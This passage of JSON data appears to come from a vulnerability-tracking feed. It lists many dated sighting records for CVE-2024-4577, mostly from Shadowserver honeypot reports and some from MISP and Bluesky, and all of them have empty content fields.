"", "creation_timestamp": "2025-05-30T00:00:00.000000Z"}, {"uuid": "43bcc926-0366-4c88-82d6-57f555b02a74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-22)", "content": "", "creation_timestamp": "2025-04-22T00:00:00.000000Z"}, {"uuid": "5e3f7897-9475-4818-9883-09d2d3f7a398", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-03)", "content": "", "creation_timestamp": "2025-07-03T00:00:00.000000Z"}, {"uuid": "44d0c4a6-a6da-4e59-a939-ac058f1bde6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-16)", "content": "", "creation_timestamp": "2025-05-16T00:00:00.000000Z"}, {"uuid": "b4042140-13a9-488a-b3b3-fa8999fd181d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-23)", "content": "", "creation_timestamp": "2025-04-23T00:00:00.000000Z"}, {"uuid": "84dacecd-58e9-4895-a7ee-6e3402b27ba2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-24)", "content": "", "creation_timestamp": "2025-05-24T00:00:00.000000Z"}, {"uuid": "b34440a3-7afb-45bb-84a6-472997740cfc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-08)", "content": "", "creation_timestamp": "2025-06-08T00:00:00.000000Z"}, {"uuid": "8662daa9-ea4e-4abd-8cc5-ccdc9099e581", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-24)", "content": "", "creation_timestamp": "2025-04-24T00:00:00.000000Z"}, {"uuid": "95a16f9d-3926-4543-aac9-8a0cc05603af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-25)", "content": "", "creation_timestamp": "2025-04-25T00:00:00.000000Z"}, {"uuid": "fad1384a-475a-477e-85cb-6b6210399072", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-15)", "content": "", "creation_timestamp": "2025-07-15T00:00:00.000000Z"}, {"uuid": "022e2c98-7498-4bbb-be97-b66a72a5ee1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-26)", "content": "", "creation_timestamp": "2025-04-26T00:00:00.000000Z"}, {"uuid": "8d86d1d4-bd3b-4c56-8f0c-16b0485f7d9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-27)", "content": "", "creation_timestamp": "2025-04-27T00:00:00.000000Z"}, {"uuid": "920e1222-8ab8-4f98-b550-8fc3ed6f553a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-14)", "content": "", "creation_timestamp": "2025-06-14T00:00:00.000000Z"}, {"uuid": "cb306f18-fd22-422d-ac67-79695aa27146", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-28)", "content": "", "creation_timestamp": "2025-04-28T00:00:00.000000Z"}, {"uuid": "b09dc4d6-f956-447d-8e96-fda361c8852a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-02)", "content": "", "creation_timestamp": "2025-06-02T00:00:00.000000Z"}, {"uuid": "22a899aa-3b7e-4a31-a4dc-628a4554a5bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-29)", "content": "", "creation_timestamp": "2025-04-29T00:00:00.000000Z"}, {"uuid": "6ff46c41-ccee-4a19-b3cb-148a40b22a56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-01)", "content": "", "creation_timestamp": "2025-05-01T00:00:00.000000Z"}, {"uuid": "1e8f4382-6f6c-439b-a405-733f7cee3804", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-23)", "content": "", "creation_timestamp": "2025-06-23T00:00:00.000000Z"}, {"uuid": "92d8f042-62f5-4667-9357-38d9d0340ad2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-22)", "content": "", "creation_timestamp": "2025-05-22T00:00:00.000000Z"}, {"uuid": "e352748f-c2c2-4fa0-a9f1-9a8711097fc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-02)", "content": "", "creation_timestamp": "2025-05-02T00:00:00.000000Z"}, {"uuid": "ea1752d0-6c94-42ef-925e-ab4846fb2923", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-31)", "content": "", "creation_timestamp": "2025-05-31T00:00:00.000000Z"}, {"uuid": "5fcd21f5-8f7d-4406-830c-ac805e80f2b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-03)", "content": "", "creation_timestamp": "2025-05-03T00:00:00.000000Z"}, {"uuid": "a0ba7e8c-f13c-4695-bd4d-5759e7aeb7e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-04)", "content": "", "creation_timestamp": "2025-05-04T00:00:00.000000Z"}, {"uuid": "b38e073a-f9a0-4763-8ea4-6e4f78d95ba6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-13)", "content": "", "creation_timestamp": "2025-07-13T00:00:00.000000Z"}, {"uuid": "fe261ee6-be5f-40e9-b246-8944e0638077", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-05)", "content": "", "creation_timestamp": "2025-05-05T00:00:00.000000Z"}, {"uuid": "dacb3aa9-268f-4191-9438-c78918d5db67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-06)", "content": "", "creation_timestamp": "2025-05-06T00:00:00.000000Z"}, {"uuid": "51f68475-dc15-40c0-9c1a-c723b6fd6ec1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-06)", "content": "", "creation_timestamp": "2025-05-06T00:00:00.000000Z"}, {"uuid": "97ff00c5-0eb3-47d7-bf81-75fdd4912edb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-07)", "content": "", "creation_timestamp": "2025-05-07T00:00:00.000000Z"}, {"uuid": "7a13e0c0-c2e9-4e45-baa0-6ed8ed32b6ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-07)", "content": "", "creation_timestamp": "2025-05-07T00:00:00.000000Z"}, {"uuid": "90a8223a-2691-48ed-864a-a8a1c4aeb8b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-20)", "content": "", "creation_timestamp": "2025-06-20T00:00:00.000000Z"}, {"uuid": "f6178933-0ee0-49db-b91f-eefa18f5663e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-09)", "content": "", "creation_timestamp": "2025-07-09T00:00:00.000000Z"}, {"uuid": "bdd1aef5-89ef-4c60-bd54-04205632a49a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-02)", "content": "", "creation_timestamp": "2025-07-02T00:00:00.000000Z"}, {"uuid": "b03f543f-589e-4169-8743-961806deb61f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/hackingne.ws/post/3loo3cvyhdd2t", "content": "", "creation_timestamp": "2025-05-08T14:03:52.113525Z"}, {"uuid": "5432ef59-42c2-47a5-b462-ec826e35ba59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-08)", "content": "", "creation_timestamp": "2025-05-08T00:00:00.000000Z"}, {"uuid": "403628d3-d775-40b8-abb2-e016c9c91382", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-25)", "content": "", "creation_timestamp": "2025-06-25T00:00:00.000000Z"}, {"uuid": "417a56a2-ef70-4eee-801c-71748c6c102d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-09)", "content": "", "creation_timestamp": "2025-05-09T00:00:00.000000Z"}, {"uuid": "b8b75375-f5ce-42c3-bc76-c0238ed1a6a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-06-18)", "content": "", "creation_timestamp": "2025-06-18T00:00:00.000000Z"}, {"uuid": "754f71c6-7eca-4447-b1d4-b63799e5792f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-10)", "content": "", "creation_timestamp": "2025-05-10T00:00:00.000000Z"}, {"uuid": "020b0bff-488a-4e0c-82fa-aae271e74a04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-25)", "content": "", "creation_timestamp": "2025-05-25T00:00:00.000000Z"}, {"uuid": "19c1409f-a6e9-4233-896d-9cee551e22ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-18)", "content": "", "creation_timestamp": "2025-06-18T00:00:00.000000Z"}, {"uuid": "c818a8bd-b727-44b3-98e8-e14d481edb64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-12)", "content": "", "creation_timestamp": "2025-05-12T00:00:00.000000Z"}, {"uuid": "ad410615-01cc-478c-b0f6-d6bcc41a80d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-15)", "content": "", "creation_timestamp": "2025-06-15T00:00:00.000000Z"}, {"uuid": "bbf8796f-315a-4e70-ac76-2532b8179a6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-29)", "content": "", "creation_timestamp": "2025-06-29T00:00:00.000000Z"}, {"uuid": "4718ab7c-6bc1-4cfa-8dcb-dd18a6a8cac5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-06)", "content": "", "creation_timestamp": "2025-06-06T00:00:00.000000Z"}, {"uuid": "61c15ecb-f035-4bf5-8c74-5dba19b7bf4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-08)", "content": "", "creation_timestamp": "2025-07-08T00:00:00.000000Z"}, {"uuid": "b77ae6f0-7052-475a-ba9d-dd0922ecab71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-04)", "content": "", "creation_timestamp": "2025-06-04T00:00:00.000000Z"}, {"uuid": "5ecaccfb-2f63-4fa1-8aa4-459241887c99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-04)", "content": "", "creation_timestamp": "2025-07-04T00:00:00.000000Z"}, {"uuid": "cfc63b3c-5fa2-4ec8-9fb5-079e186bc99b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-27)", "content": "", "creation_timestamp": "2025-06-27T00:00:00.000000Z"}, {"uuid": "c05ce1de-5fa9-4492-9274-306db2d83280", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-16)", "content": "", "creation_timestamp": "2025-07-16T00:00:00.000000Z"}, {"uuid": "9a45da30-0042-47b2-abdb-32f1fee58505", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-17)", "content": "", "creation_timestamp": "2025-07-17T00:00:00.000000Z"}, {"uuid": "0442ca80-af80-48d1-89e2-a05d22ba12ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-01)", "content": "", "creation_timestamp": "2025-10-01T00:00:00.000000Z"}, {"uuid": "ac0bee19-ad56-494c-971d-963c002573a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:03.000000Z"}, {"uuid": "686ec5ab-b943-41fa-b427-4e7b8f9aff91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-21)", "content": "", "creation_timestamp": "2025-10-21T00:00:00.000000Z"}, {"uuid": "7d64aefe-490e-4763-a455-ff4bf8bb53a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-24)", "content": "", "creation_timestamp": "2025-07-24T00:00:00.000000Z"}, {"uuid": "e2a4a505-9d03-4a87-8124-e5390b0106d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-25)", "content": "", "creation_timestamp": "2025-09-25T00:00:00.000000Z"}, {"uuid": "6ab1253a-efb8-472d-81f3-9fcc891fbeec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-02)", "content": "", "creation_timestamp": "2025-08-02T00:00:00.000000Z"}, {"uuid": "f5d99708-edb1-4e60-a107-09792be1da61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-03)", "content": "", "creation_timestamp": "2025-08-03T00:00:00.000000Z"}, {"uuid": "23ce3750-d09c-483f-855f-13d5d70d114f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-02)", "content": "", "creation_timestamp": "2025-10-02T00:00:00.000000Z"}, {"uuid": "785b7a28-d709-4c2b-b567-f8786bf42810", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-28)", "content": "", "creation_timestamp": "2025-11-28T00:00:00.000000Z"}, {"uuid": "b20b40e3-f34c-441f-808a-f08200e074e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-23)", "content": "", "creation_timestamp": "2025-10-23T00:00:00.000000Z"}, {"uuid": "15cdba98-ba3e-4e09-b01b-6d1d78d85420", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "MISP/02fb130c-7874-4693-9b66-81ed91a2e996", "content": "", "creation_timestamp": "2025-08-12T13:33:28.000000Z"}, {"uuid": "c756b285-bdc5-46f9-9496-9a0740c215f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-22)", "content": "", "creation_timestamp": "2025-11-22T00:00:00.000000Z"}, {"uuid": "6d7eaaba-ce99-47e3-804b-66b35c3d7e79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-15)", "content": "", "creation_timestamp": "2025-08-15T00:00:00.000000Z"}, {"uuid": "3f6aa3e7-dc87-456d-ab7b-5461c51fdc36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-16)", "content": "", "creation_timestamp": "2025-08-16T00:00:00.000000Z"}, {"uuid": "60f6260f-450f-49be-8fcb-707c02a6a082", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-17)", "content": "", "creation_timestamp": "2025-08-17T00:00:00.000000Z"}, {"uuid": "fdf462d9-43cf-43de-b3d1-766b1d03524c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-18)", "content": "", "creation_timestamp": "2025-08-18T00:00:00.000000Z"}, {"uuid": "697f7c76-d072-4e29-bfd3-ef53cc32ff58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-19)", "content": "", "creation_timestamp": "2025-08-19T00:00:00.000000Z"}, {"uuid": "67bbde5c-b590-4db0-b2e7-d4b1fc62cbca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "MISP/02fb130c-7874-4693-9b66-81ed91a2e996", "content": "", "creation_timestamp": "2025-08-21T03:19:27.000000Z"}, {"uuid": "9a0c30db-0ba5-4af4-91c8-10d0c5e890ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-20)", "content": "", "creation_timestamp": "2025-08-20T00:00:00.000000Z"}, {"uuid": "942fe143-ef43-4541-abbe-1e4229ffeb2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-25)", "content": "", "creation_timestamp": "2025-11-25T00:00:00.000000Z"}, {"uuid": "d29670bd-d79d-4552-b31f-757a99df281b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-22)", "content": "", "creation_timestamp": "2025-08-22T00:00:00.000000Z"}, {"uuid": "595d4d7d-0948-44ac-a127-459724eeddb1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-23)", "content": "", "creation_timestamp": "2025-08-23T00:00:00.000000Z"}, {"uuid": "e3809e98-e8af-448b-97d5-2fec7af32736", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-27)", "content": "", "creation_timestamp": "2025-11-27T00:00:00.000000Z"}, {"uuid": "dfbd4098-15b8-4b84-bee7-4c5f44a74dcf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3m6ede4hb7t2j", "content": "", "creation_timestamp": "2025-11-24T07:44:11.736093Z"}, {"uuid": "a170a787-8f8c-41ee-939c-21f44d9ce511", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 